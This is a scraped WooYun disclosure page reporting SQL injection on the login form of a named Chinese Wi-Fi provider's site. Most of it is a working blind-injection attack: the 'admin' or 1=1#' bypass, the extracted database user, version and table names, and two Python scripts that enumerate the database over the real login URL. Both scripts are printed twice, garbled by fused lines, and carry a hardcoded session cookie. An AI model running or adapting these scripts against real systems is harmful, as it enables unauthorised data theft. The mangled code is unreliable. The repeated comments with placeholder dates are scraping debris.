迈外迪某站or注入root权限（附验证脚本）

发表于 2014年12月24日
WooYun漏洞库

漏洞概要

缺陷编号：WooYun-2014-088434

漏洞标题：迈外迪某站or注入root权限（附验证脚本）

漏洞详情

披露状态：

2014-12-24: 细节已通知厂商并且等待厂商处理中
2014-12-26: 厂商已经确认，细节仅向厂商公开
2015-01-05: 细节向核心白帽子及相关领域专家公开
2015-01-15: 细节向普通白帽子公开
2015-01-25: 细节向实习白帽子公开
2015-02-07: 细节向公众公开

简要描述：

详细说明：

http://cmccsh.wiwide.com/login登陆处万能密码登陆，存在sql盲注admin' or 1=1#失败时：

正确时：

脚本中跑到结果：user; [email protected]version: 5.5.37database: adsads的第一个表：ad_day貌似只有一个表count了一下大约10000条数据，没有写进一步的脚本

漏洞证明：

注入数据表的脚本

#coding: utf-8<br>
#date: 2014/12/18import requests<br>
import sys<br>
import timedef blind_inject():payloads = 'rotabcdefghijklmnpqsuvwxyz0123456789@_.'<br>
	user = ''<br>
	end = 0<br>
	for i in range(1,40):<br>
		if end == 1:<br>
			break<br>
		for j in payloads:<br>
			time.sleep(1)<br>
			headers ={<br>
			'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',<br>
			'Origin': 'http://cmccsh.wiwide.com/login',<br>
			'User-Agent': 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36',<br>
			'Content-Type': 'application/x-www-form-urlencoded',<br>
			'Referer': 'http://cmccsh.wiwide.com/login',<br>
			'Accept-Encoding': 'gzip,deflate,sdch',<br>
			'Accept-Language': 'zh-CN,zh;q=0.8',<br>
			'Cookie': 'JSESSIONID=aBBzLjv2g4je',}<br>
			exp = "or ( select (select ascii(substr(group_concat(table_name),%d,1)) from information_schema.tables where table_schema=0x616473 limit 0,1)=%d)"%(i,ord(j))<br>
			url = "http://cmccsh.wiwide.com/login"<br>
			data = 	"username=admin' %s #&pwd=1&login=1"%(exp)<br>
			mark = 1r = requests.post(url, data, headers=headers, allow_redirects=False)find = (len(r.text)<10)<br>
			while r.status_code !=200 and find == False:<br>
				r = requests.get(url)if find:user = user+j<br>
				print '\n[*]Guessing ' + user,<br>
						#print data<br>
						#print r.text<br>
				time.sleep(1)<br>
				break<br>
			else:<br>
				print '.',if not user[::-1].startswith(j):<br>
			end = 1<br>
	print '\n',user<br>
def run():blind_inject()<br>
if __name__ == '__main__':<br>
	run()

#coding: utf-8

#date: 2014/12/18import requests

import sys

import timedef blind_inject():payloads = 'rotabcdefghijklmnpqsuvwxyz0123456789@_.'

user = ''

end = 0

for i in range(1,40):

if end == 1:

break

for j in payloads:

time.sleep(1)

headers ={

'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',

'Origin': 'http://cmccsh.wiwide.com/login',

'User-Agent': 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36',

'Content-Type': 'application/x-www-form-urlencoded',

'Referer': 'http://cmccsh.wiwide.com/login',

'Accept-Encoding': 'gzip,deflate,sdch',

'Accept-Language': 'zh-CN,zh;q=0.8',

'Cookie': 'JSESSIONID=aBBzLjv2g4je',}

exp = "or ( select (select ascii(substr(group_concat(table_name),%d,1)) from information_schema.tables where table_schema=0x616473 limit 0,1)=%d)"%(i,ord(j))

url = "http://cmccsh.wiwide.com/login"

data = "username=admin' %s #&pwd=1&login=1"%(exp)

mark = 1r = requests.post(url, data, headers=headers, allow_redirects=False)find = (len(r.text)<10)

while r.status_code !=200 and find == False:

r = requests.get(url)if find:user = user+j

print '\n[*]Guessing ' + user,

#print data

#print r.text

time.sleep(1)

break

else:

print '.',if not user[::-1].startswith(j):

end = 1

print '\n',user

def run():blind_inject()

if __name__ == '__main__':

run()

注入user、version、database的脚本

#coding: utf-8<br>
#date: 2014/12/18import requests<br>
import sys<br>
import timedef blind_inject():payloads = 'rotabcdefghijklmnpqsuvwxyz0123456789@_.'<br>
	user = ''<br>
	end = 0<br>
	for i in range(1,40):<br>
		if end == 1:<br>
			break<br>
		for j in payloads:<br>
			time.sleep(1)<br>
			headers ={<br>
			'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',<br>
			'Origin': 'http://cmccsh.wiwide.com/login',<br>
			'User-Agent': 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36',<br>
			'Content-Type': 'application/x-www-form-urlencoded',<br>
			'Referer': 'http://cmccsh.wiwide.com/login',<br>
			'Accept-Encoding': 'gzip,deflate,sdch',<br>
			'Accept-Language': 'zh-CN,zh;q=0.8',<br>
			'Cookie': 'JSESSIONID=aBBzLjv2g4je',}<br>
			exp = "or ascii(MID(lower(version()),%d,1))= %s"%(i,ord(j))<br>
			url = "http://cmccsh.wiwide.com/login"<br>
			data = 	"username=admin' %s #&pwd=1&login=1"%(exp)<br>
			mark = 1r = requests.post(url, data, headers=headers, allow_redirects=False)find = (len(r.text)<10)<br>
			while r.status_code !=200 and find == False:<br>
				r = requests.get(url)if find:user = user+j<br>
				print '\n[*]Guessing ' + user,<br>
						#print data<br>
						#print r.text<br>
				time.sleep(1)<br>
				break<br>
			else:<br>
				print '.',if not user[::-1].startswith(j):<br>
			end = 1<br>
	print '\n',user<br>
def run():blind_inject()<br>
if __name__ == '__main__':<br>
	run()

#coding: utf-8

#date: 2014/12/18import requests

import sys

import timedef blind_inject():payloads = 'rotabcdefghijklmnpqsuvwxyz0123456789@_.'

user = ''

end = 0

for i in range(1,40):

if end == 1:

break

for j in payloads:

time.sleep(1)

headers ={

'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',

'Origin': 'http://cmccsh.wiwide.com/login',

'User-Agent': 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36',

'Content-Type': 'application/x-www-form-urlencoded',

'Referer': 'http://cmccsh.wiwide.com/login',

'Accept-Encoding': 'gzip,deflate,sdch',

'Accept-Language': 'zh-CN,zh;q=0.8',

'Cookie': 'JSESSIONID=aBBzLjv2g4je',}

exp = "or ascii(MID(lower(version()),%d,1))= %s"%(i,ord(j))

url = "http://cmccsh.wiwide.com/login"

data = "username=admin' %s #&pwd=1&login=1"%(exp)

mark = 1r = requests.post(url, data, headers=headers, allow_redirects=False)find = (len(r.text)<10)

while r.status_code !=200 and find == False:

r = requests.get(url)if find:user = user+j

print '\n[*]Guessing ' + user,

#print data

#print r.text

time.sleep(1)

break

else:

print '.',if not user[::-1].startswith(j):

end = 1

print '\n',user

def run():blind_inject()

if __name__ == '__main__':

run()

修复方案：

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：10

确认时间：2014-12-2618:17

厂商回复：

问题已经确认，多谢白帽子的反馈！

评价

2010-01-01 00:00 0x_Jin 白帽子 | Rank:234 漏洞数:25)

看到rss的提醒 xxxx(附验证脚本) 我还以为是李姐姐(lijiejie)
2010-01-01 00:00 疯子白帽子 | Rank:254 漏洞数:39)

看到rss的提醒 xxxx(附验证脚本) 我还以为是李姐姐(lijiejie)
2010-01-01 00:00 ki11y0u 白帽子 | Rank:72 漏洞数:7)

看到rss的提醒 xxxx(附验证脚本) 我还以为是李姐姐(lijiejie)
2010-01-01 00:00 子非海绵宝宝白帽子 | Rank:1220 漏洞数:113)

看到rss的提醒 xxxx(附验证脚本) 我还以为是李姐姐(lijiejie)
2010-01-01 00:00 0c0c0f 白帽子 | Rank:30 漏洞数:5)

看到rss的提醒 xxxx(附验证脚本) 我还以为是李姐姐(lijiejie)
2010-01-01 00:00 f4ckbaidu 白帽子 | Rank:215 漏洞数:21)

看到rss的提醒 xxxx(附验证脚本) 我还以为是李姐姐(lijiejie)
2010-01-01 00:00 black hook 白帽子 | Rank:13 漏洞数:3)

看到rss的提醒 xxxx(附验证脚本) 我还以为是李姐姐(lijiejie)
2010-01-01 00:00 疯子白帽子 | Rank:254 漏洞数:39)

看到rss的提醒 xxxx(附验证脚本) 我还以为是李姐姐(lijiejie)